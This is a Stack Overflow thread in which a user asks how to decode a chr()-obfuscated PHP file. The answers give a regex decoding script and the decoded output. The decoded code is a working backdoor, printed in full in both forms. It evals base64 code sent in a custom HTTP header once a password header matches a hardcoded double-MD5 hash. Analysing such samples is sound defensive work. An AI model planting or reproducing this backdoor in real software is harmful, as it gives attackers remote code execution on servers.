Decode PHP chr() to normal code

Question

I got a PHP file encrypted with chr() function:

{${$YVixEnfDe=chr(99).chr(114).chr(101).chr(97).chr(116).chr(101).chr(95).chr(102).chr(117).chr(110).chr(99).chr(116).chr(105).chr(111).chr(110)}}{${$YUnPuGRDE=$YVixEnfDe(chr(36).chr(97),chr(114).chr(101).chr(116).chr(117).chr(114).chr(110).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(97).chr(41).chr(59))}}{${$YUnPuGRDE(chr(105).chr(102).chr(40).chr(33).chr(101).chr(109).chr(112).chr(116).chr(121).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(72).chr(84).chr(84).chr(80).chr(95).chr(77).chr(95).chr(73).chr(82).chr(85).chr(65).chr(75).chr(39).chr(93).chr(41).chr(97).chr(110).chr(100).chr(33).chr(101).chr(109).chr(112).chr(116).chr(121).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(72).chr(84).chr(84).chr(80).chr(95).chr(68).chr(74).chr(78).chr(65).chr(66).chr(67).chr(85).chr(39).chr(93).chr(41).chr(41).chr(123).chr(105).chr(102).chr(40).chr(109).chr(100).chr(53).chr(40).chr(109).chr(100).chr(53).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(72).chr(84).chr(84).chr(80).chr(95).chr(77).chr(95).chr(73).chr(82).chr(85).chr(65).chr(75).chr(39).chr(93).chr(41).chr(41).chr(61).chr(61).chr(39).chr(52).chr(99).chr(100).chr(49).chr(102).chr(101).chr(52).chr(97).chr(54).chr(52).chr(98).chr(48).chr(102).chr(98).chr(98).chr(98).chr(97).chr(98).chr(55).chr(99).chr(50).chr(101).chr(49).chr(97).chr(56).chr(57).chr(99).chr(50).chr(100).chr(100).chr(52).chr(97).chr(39).chr(41).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(72).chr(84).chr(84).chr(80).chr(95).chr(68).chr(74).chr(78).chr(65).chr(66).chr(67).chr(85).chr(39).chr(93).chr(41).chr(41).chr(59).chr(125))}}

Which unencrypted from ASCII it's:

{${$YVixEnfDe=chr(c).chr(r).chr(e).chr(a).chr(t).chr(e).chr(_).chr(f).chr(u).chr(n).chr(c).chr(t).chr(i).chr(o).chr(n)}}{${$YUnPuGRDE=$YVixEnfDe(chr($).chr(a),chr(r).chr(e).chr(t).chr(u).chr(r).chr(n).chr( ).chr(@).chr(e).chr(v).chr(a).chr(l).chr(().chr($).chr(a).chr()).chr(;))}}{${$YUnPuGRDE(chr(i).chr(f).chr(().chr(!).chr(e).chr(m).chr(p).chr(t).chr(y).chr(().chr($).chr(_).chr(S).chr(E).chr(R).chr(V).chr(E).chr(R).chr([).chr(').chr(H).chr(T).chr(T).chr(P).chr(_).chr(M).chr(_).chr(I).chr(R).chr(U).chr(A).chr(K).chr(').chr(]).chr()).chr(a).chr(n).chr(d).chr(!).chr(e).chr(m).chr(p).chr(t).chr(y).chr(().chr($).chr(_).chr(S).chr(E).chr(R).chr(V).chr(E).chr(R).chr([).chr(').chr(H).chr(T).chr(T).chr(P).chr(_).chr(D).chr(J).chr(N).chr(A).chr(B).chr(C).chr(U).chr(').chr(]).chr()).chr()).chr({).chr(i).chr(f).chr(().chr(m).chr(d).chr(5).chr(().chr(m).chr(d).chr(5).chr(().chr($).chr(_).chr(S).chr(E).chr(R).chr(V).chr(E).chr(R).chr([).chr(').chr(H).chr(T).chr(T).chr(P).chr(_).chr(M).chr(_).chr(I).chr(R).chr(U).chr(A).chr(K).chr(').chr(]).chr()).chr()).chr(=).chr(=).chr(').chr(4).chr(c).chr(d).chr(1).chr(f).chr(e).chr(4).chr(a).chr(6).chr(4).chr(b).chr(0).chr(f).chr(b).chr(b).chr(b).chr(a).chr(b).chr(7).chr(c).chr(2).chr(e).chr(1).chr(a).chr(8).chr(9).chr(c).chr(2).chr(d).chr(d).chr(4).chr(a).chr(').chr()).chr(@).chr(e).chr(v).chr(a).chr(l).chr(().chr(b).chr(a).chr(s).chr(e).chr(6).chr(4).chr(_).chr(d).chr(e).chr(c).chr(o).chr(d).chr(e).chr(().chr($).chr(_).chr(S).chr(E).chr(R).chr(V).chr(E).chr(R).chr([).chr(').chr(H).chr(T).chr(T).chr(P).chr(_).chr(D).chr(J).chr(N).chr(A).chr(B).chr(C).chr(U).chr(').chr(]).chr()).chr()).chr(;).chr(}))}}

How can i join each chr in order to see it on a readable format?

Please elaborate your question. can you provide expected output? — sandeepsure, Oct 04 '15 at 05:52
You could just find-replace all the `).chr(` with nothing in your text editor of choice. — Alexander O'Mara, Oct 04 '15 at 05:54
Although simply copying all the original chr calls together with an echo statement would probably be easier. Like so: `echo chr(99).chr(114).chr(101).chr(97).chr(116);` — Alexander O'Mara, Oct 04 '15 at 05:55
BTW, this looks like a typical PHP script for remove code execution, in case you were wondering. — Alexander O'Mara, Oct 04 '15 at 06:00
Thanks Notepad++ search/replace done the trick, it seems that this is related to this exploit: https://stackoverflow.com/questions/12839626/http-soviet-and-http-pack — Jonathan Meyer, Oct 04 '15 at 06:08

score 1 · Answer 1 · answered Oct 04 '15 at 05:56

You could just echo out each string.

ie

echo chr(99).chr(114).chr(101).chr(97).chr(116).chr(101).chr(95).chr(102).chr(117).chr(110).chr(99).chr(116).chr(105).chr(111).chr(110);
// create_function

echo chr(36).chr(97),chr(114).chr(101).chr(116).chr(117).chr(114).chr(110).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(97).chr(41).chr(59);
// $areturn @eval($a);

Then replace the original jibberish with your "decoded" code. Tedious but at least it works

score 1 · Accepted Answer · answered Oct 04 '15 at 06:16

You can write a basic script for decrypting;

<?php

    function callback($hits){
        return chr($hits['1']);
    }

    $php_content = file_get_contents("./encrypted.php");
    $php_content = preg_replace_callback('/chr\((\d+)\)(\.|)/', "callback", $php_content);
    file_put_contents("./encrypted.php", $php_content);

?>

Don't forget, your encrypted file name should be encrypted.php or you should change name of the file from the code. And the other thing that both script and encrypted file should be in the same folder/directory or you should change the path from the code.

After this process, the result is:

{${$YVixEnfDe=create_function}}{${$YUnPuGRDE=$YVixEnfDe($a,return @eval($a);)}}{${$YUnPuGRDE(if(!empty($_SERVER['HTTP_M_IRUAK'])and!empty($_SERVER['HTTP_DJNABCU'])){if(md5(md5($_SERVER['HTTP_M_IRUAK']))=='4cd1fe4a64b0fbbbab7c2e1a89c2dd4a')@eval(base64_decode($_SERVER['HTTP_DJNABCU']));})}}

Decode PHP chr() to normal code

2 Answers2